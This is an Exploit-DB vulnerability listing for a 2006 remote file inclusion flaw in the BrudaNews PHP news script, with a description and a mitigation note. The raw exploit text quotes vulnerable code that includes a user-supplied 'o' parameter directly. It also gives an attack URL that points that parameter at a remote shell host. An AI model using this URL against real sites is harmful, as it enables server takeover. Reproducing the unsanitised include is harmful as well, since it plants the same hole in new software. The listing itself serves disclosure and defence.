header-logo
Suggest Exploit
vendor:
BrudaNews
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: BrudaNews
Affected Version From: v1.0
Affected Version To: v1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:brudaswen:brudanews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

BrudaNews <= v1.1 (o) Remote File Inclusion Exploit

A vulnerability exists in BrudaNews v1.1 and v1.0 which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'o' parameter in the 'admin/index.php' script not properly sanitizing user-supplied input. This can be exploited to include arbitrary files from remote hosts by passing an URL as the 'o' parameter. Successful exploitation requires that 'allow_url_fopen' is enabled.

Mitigation:

Disable 'allow_url_fopen' and ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#==============================================================================================
#BrudaNews <= v1.1 (o) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://www.brudaswen.de      
#                                                                      
#Version : v1.1 & 1.0                                            
#                                                        
#================================================================================================
#
#Example : http://www.nebelweb.de/php/news
#
#================================================================================================
#Bug in : admin/index.php
#
#Vlu Code :
#--------------------------------
 <?
 if($_GET[o] != "")
 {
 include($_GET[o].".php");
  }
 BrudaNews();
   ?>
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/index.php?o=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz
==================================================================================================

# milw0rm.com [2006-09-25]